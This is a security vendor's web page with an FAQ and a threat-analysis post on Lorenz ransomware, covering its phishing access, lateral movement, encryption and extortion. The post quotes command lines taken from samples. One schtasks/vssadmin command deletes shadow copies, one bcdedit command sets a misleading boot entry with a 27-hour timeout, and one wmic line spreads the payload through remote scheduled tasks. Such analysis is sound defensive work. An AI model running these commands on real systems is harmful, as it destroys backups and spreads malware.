Frequently Asked Questions

Lorenz Ransomware: Technical Details & Attack Methods

What is Lorenz ransomware and how does it operate?

Lorenz ransomware is a malware strain that encrypts files on compromised systems and demands a ransom for decryption. It shares similarities with ThunderCrypt ransomware, though it's unclear if the same group is behind both or if Lorenz is a variant created from purchased source code. Lorenz customizes attacks for each target, often conducting research on employees, suppliers, and partners to increase the likelihood of successful phishing and lateral movement. The group uses techniques such as scheduled tasks (with names starting 'sz40'), vssadmin.exe to delete shadow copies, and bcdedit to create misleading boot entries. Lorenz also changes desktop wallpapers and deletes event logs to cover its tracks. Note: Lorenz binaries are frequently updated, and behaviors may vary between incidents. Detailed limitations not publicly documented; ask sales for specifics.

How does Lorenz ransomware gain initial access to a network?

Lorenz typically gains access via phishing emails sent from legitimate accounts of compromised suppliers or partners. This social engineering increases the likelihood that targets will trust and interact with the malicious email, leading to installation of malware that provides attackers with full network access, even after password resets. Note: Attack vectors may evolve as the group updates its tactics.

What unique techniques does Lorenz use during attacks?

Lorenz employs several unique techniques, including creating scheduled tasks (names starting with 'sz40') to run vssadmin.exe for deleting shadow copies, using bcdedit to create misleading boot entries with long timeouts (up to 27 hours), and changing desktop wallpapers to alert users. The group also deletes Windows event logs, including PowerShell logs, to remove evidence of their activities. Note: These behaviors may not be present in every variant, as the group frequently updates its binaries.

How does Lorenz handle file encryption and ransom notes?

Lorenz uses AES encryption and appends the extension '.Lorenz.sz40' to encrypted files, deleting the originals. It drops a ransom note named 'HELP_SECURITY_EVENT.html' (recently changed to 'HELP.txt') in each folder, which includes information about the attack, a link to the Lorenz data leak website, and a unique TOR payment site for ransom negotiation. Note: The ransom note format and file extensions may change as the group updates its methods.

What extortion techniques does Lorenz use after stealing data?

Lorenz threatens to publish stolen data on its leak site if the ransom is not paid. Initially, data is made available for sale to other threat actors. If unsold, password-protected RAR archives are released, and eventually, the passwords are published, making the data public. Lorenz also sells access to compromised networks, a trend growing among ransomware groups. Note: Extortion tactics may evolve over time.

Is there a free decryptor for Lorenz ransomware?

A free decryptor was released by the No More Ransom project (a joint initiative by Europol and other law enforcement agencies), but it is very limited. It only supports .docx, .pptx, .xlsx, and .zip files, and in tests, it often failed to work on both old and new Lorenz samples. Victims should not rely on this tool for full recovery. Note: Decryptor limitations are significant; consult with security professionals for the latest options.

Defending Against Lorenz and Other Ransomware

How can organizations defend against Lorenz ransomware and similar threats?

Organizations should implement core practices such as prompt patching of vulnerabilities, enforcing least privilege access, network segmentation, maintaining backups, and rigorous monitoring. Continuous red teaming and attack simulation, as provided by platforms like Cymulate, help verify controls and readiness. For more, see our blog post on ransomware defense. Note: No defense is foolproof; legacy systems may require additional monitoring and containment.

How does Cymulate help organizations validate defenses against ransomware like Lorenz?

Cymulate enables organizations to simulate real-world ransomware attacks, including malware, phishing, and lateral movement, to test the effectiveness of security controls. The platform provides continuous threat validation, actionable remediation guidance, and integrates with existing security infrastructure. Customers report measurable improvements, such as a 52% reduction in critical exposures and a 3X increase in threat detection. Note: Cymulate is best fit for organizations seeking automated, continuous validation; teams requiring highly customized manual testing may need additional tools.

Which types of threats can Cymulate validate?

Cymulate can validate a wide range of threats, including malware, phishing, ransomware, advanced persistent threats (APTs), insider threats, network attacks, and web application attacks. The platform is designed to simulate diverse attack scenarios for comprehensive security validation. Note: Cymulate does not replace incident response or forensic investigation tools.

Decryption, Remediation & Recovery

What are the limitations of the free Lorenz decryptor?

The free decryptor released by No More Ransom only supports .docx, .pptx, .xlsx, and .zip files, and has been found ineffective on many Lorenz samples. It often fails to decrypt files and may not work on newer variants. Victims should not rely solely on this tool for recovery. Note: Always consult with security professionals before attempting decryption.

General Ransomware & Security Practices

What is ransomware?

Ransomware is a type of malicious software that encrypts a victim’s files and demands a ransom to restore access. For more details, see our ransomware glossary entry. Note: Not all ransomware can be decrypted without paying the ransom or restoring from backups.

What is Ransomware-as-a-Service (RaaS) and how is it sold on the dark web?

Ransomware-as-a-Service (RaaS) is a model where cybercriminals sell ransomware kits on the dark web, enabling even non-technical criminals to launch attacks. Prices can be as low as USD 39 for variants like Stampado, which includes a lifetime license. This expands the reach of ransomware threats. Learn more in our blog post on RaaS in the dark web marketplace. Note: RaaS increases the volume and diversity of ransomware attacks.

Cymulate Platform & Security Validation

How does Cymulate differ from traditional penetration testing for ransomware defense?

Traditional penetration tests are episodic and resource-intensive, often failing to keep pace with evolving threats like Lorenz. Cymulate automates continuous attack simulation, providing actionable insights and faster validation cycles. For example, customers report 40X faster threat validation and a 60% increase in team efficiency. Note: Cymulate complements, but does not fully replace, manual penetration testing for highly targeted scenarios.

What security and compliance certifications does Cymulate hold?

Cymulate holds SOC2 Type II, ISO 27001:2013, ISO 27701, ISO 27017, and CSA STAR Level 1 certifications. These cover security, availability, confidentiality, privacy, and cloud service security. For more details, visit our security overview page. Note: Certification scope and coverage may change; verify with Cymulate for the latest status.

Cymulate named a Customers' Choice in 2026 Gartner® Peer Insights™
Learn More
New: Cymulate Cowork for Agentic Cyber Defense Engineering
Learn More
New Bitsight Integration: Turn Threat Intelligence into Validated Security
Learn More
Introducing Cymulate Vero AI for Agentic Cyber Defense Engineering
Learn More

Lorenz Ransomware

February 13, 2022

Lorenz appears to be the same as ThunderCrypt ransomware. However, it's not clear if Lorenz was created by the same group or if the group purchased the source code of ThunderCrypt and created its own variant. Shortly after Lorenz was discovered, the group faced a temporary problem after researchers published a free decryptor (download here). The decryptor was released by the project No More Ransom, a joint project by law enforcement agencies including Europol's European Cybercrime Center. It's worth noting that that decrypter is very limited and only supports .docx, .pptx, .xlsx and .zip. In addition, in the test that analysts ran for both old and newer samples - the decrypter did not work and kept alerting that it doesn't support the files The Lorenz operators put a lot of effort into their attacks. They study their target's employees, suppliers and partners. This way, the Lorenz group can even go from one, already compromised victim, to another. The knowledge they have collected is used to customize the attack specifically for the target. In a reported incident, the attackers used one compromised victim to "jump" to another. The group gained access to the network via a phishing email, but not just any phishing email. The group, after doing their research on the target, sent the email from a legitimate email account of a real employee at a supplier that they'd already been compromised. This way the email appears to be legitimate and increases the chances of falling to the scam. Then the attackers trick employees into installing an application that provides the attackers with full access to the network, including the employees' email, even after they reset their passwords. In some cases, the attackers even used the compromised email accounts to email the IT, legal, and cyber insurance teams working with the targeted organization to threaten further attacks if they didn't pay. After gaining an initial foothold in the network, the attackers start to perform reconnaissance commands, move laterally within the network, and collect sensitive data including credentials, file, databases and emails. The main goal for the attackers when moving laterally is to compromise a domain controller and obtain domain administrator credentials. This allows them to perform additional activities, and later on selling access to the compromised network. Since the Lorenz group customize the attack for the target, analysts have observed different binaries of Lorenz that have different behavior. This can also point to the fact that the Lorenz group continues to update the ransomware, even if that means to create changes frequently. Some of the Lorenz binaries observed used the well known vssadmin command to delete the virtual shadow copies of the system. Vssadmin.exe is a command-line tool that manages Volume Shadow Copy Service (VSS), which captures and copies stable images for backup on running systems. Ransomware commonly uses vssadmin.exe to delete shadow copies and other backups of files before encrypting the files themselves. This is another way to ensure that the victim will be forced to pay to decrypt the valuable files when they can neither be decrypted or retrieved from VSS. Lorenz creates a scheduled task whose name starts with "sz40" and then sets it to run Vssadmin with the following command line. After running, the scheduled task is deleted. cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz403 /TR "vssadmin Delete Shadows /For=C:" &SCHTASKS /run /TN sz403&SCHTASKS /Delete /TN sz403 /F One unique behavior observed in some of the Lorenz binary is the creation of another boot entry for possibly misleading purposes. A boot entry is a set of options that defines a load configuration for an operating system or bootable program. It is possible to have multiple boot entries for an operating system, each with a different set of boot parameters. Lorenz uses the command utility bcdedit to copy the existing boot entry and modify it, which is the most common way to create a new boot entry. But it does one strange thing. The /timeout operator is set to 100,000 seconds, which is about 27 (!) hours. By doing so, the system waits 27 hours before the boot manager selects the default entry if the user doesn't choose manually. Since Lorenz changes the description of the boot entries to "Lorenz Encrypt System", the user can be misled that the operating system is compromised entirely. In addition, if it is a system that operates without user interaction or that the system is not in the network and it's impossible to connect, the system will not load the OS for 27 hours. cmd.exe /c bcdedit /copy {current} /d "Lorenz Encrypt System" & bcdedit /set {current} description "Lorenz Encrypt System" & bcdedit /timeout 100000 && ipconfig Some of the samples observed created a remote scheduled task that launches another ransomware binary located on a remote server within the infected network. This indicates that the attackers performed lateral movement in the environment, collected information and harvest credentials before launching the ransomware payload. The scheduled tasks names observed in the binaries are consistent with the names found when creating other scheduled tasks in other binaries, and starts with "sz40". After execution, the malware deletes the scheduled task to remove tracks. wmic /node:''' /USER:'' /PASSWORD:'' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \NETLOGONweams.exe %windir%lsamp.exe & start %windir%lsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F" Some of Lorenz binaries are also configured to change the desktop image of the machine in an additional way to alert the user about what happened. The wallpaper image is either called "Lorenz.bmp" or a random name. Lorenz drops the .bmp file into %ProgramFiles% or %Windows% folder and then sets the relevant registry keys to configure it as a desktop wallpaper. Some older versions of Lorenz found on domain controllers were observed deleting the Windows Event Logs to remove tracks of the malicious activities. Among the logs deleted are Windows PowerShell logs that contain information about PowerShell activities, which suggests the attacker has used them at some point in the attack. Lorenz uses AES encryption to encrypt the files. For each encrypted file, it appends the extension ".Lorenz.sz40". The original files are then deleted. In addition, Lorenz writes to each folder a ransom note named "HELP_SECURITY_EVENT.html" (recently changed to "HELP.txt") that contains information about what happened to the files, including a link to Lorenz data leak website and a unique TOR payment website where the victim can see the demanded ransom fee and contact the group. Lorenz has created a relatively unique extortion technique. After stealing files, emails, credentials and databases from victims, the group threatens to publish them in their data leaks website. When Lorenz publishes data, they do things a bit differently compared to other ransomware gangs. First, Lorenz makes the data available for sale to other threat actors, hackers or possible competitors. After a while, they start releasing password-protected RAR archives containing the victim's data. If no ransom is paid, and the data is not purchased, Lorenz releases the password for the RAR archives containing the data leak so that they are publicly available to anyone who downloads the files. Beside giving access to the stolen data, Lorenz, in order to maximize profit, sell access to the internal network they have compromised. This trend is starting to gain popularity among other ransomware gangs as well, due to the understanding that for some threat actors, access to the networks could be more valuable than the data itself.